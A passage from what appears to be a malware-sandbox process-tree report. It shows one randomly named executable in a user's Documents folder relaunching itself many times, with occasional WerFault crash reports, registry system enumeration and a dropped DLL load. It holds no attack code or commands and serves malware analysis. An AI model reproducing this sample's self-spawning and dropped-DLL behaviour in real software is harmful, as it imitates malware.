        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:3976
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5968
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10300
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13552
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:1552
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14652 -s 28
        13⤵
        Program crash
        
        PID:14976
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14400
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14316
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14440
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9252
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:1544
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:12492
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14544
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:15832
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:580
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6852
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10352
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13172
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11100
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:15764
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 28
        13⤵
        Program crash
        
        PID:17080
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:15164
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:16820
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9968
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:16704
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17512
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18304
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18320
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18228
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17896
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17760
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18696
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19168
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11248
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19148
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18580
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13240
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18940
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19208
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18580
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13096
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19516
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20384
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20084
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6872
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20148
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20232
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20348
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11728
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21160
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21120
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:16656
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13928
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17192
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14328
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18880
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18244
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21912
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13772
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11916
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23548
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 23548 -s 28
        13⤵
        Program crash
        
        PID:23424
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:22648
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21352
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:12320
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23252
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:8176
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:7344
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23428
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24476
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24252
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24364
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19116
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13800
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20132
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24304
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23868
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24764
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25564
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25284
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18752
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:3156
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:17188
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24896
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14104
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:12968
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:22824
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:18248
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:5096
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:15208
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19876
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:22720
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26228
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10156
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9764
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25812
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20768
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6876
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25792
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26740
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25544
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27316
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26696
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26576
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21760
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23268
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27608
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24384
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27724
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27408
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23964
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:28156
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27700
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26388
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25248
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 25248 -s 28
        13⤵
        Program crash
        
        PID:16204
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23648
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26640
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25260
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:28716
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25292
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:29500
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:28880
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:29084
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:26884
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25996
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        Loads dropped DLL
        
        PID:6028
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27476
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:30364
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:19720
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:28064
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20448
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:24256
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:23448
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27492
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:25896
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 25896 -s 28
        13⤵
        Program crash
        
        PID:16068
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21812
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:21248
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:20244
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:27816
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:31568
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:31416
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:15188
        
        C:\Windows\SysWOW64\WerFault.exe
        
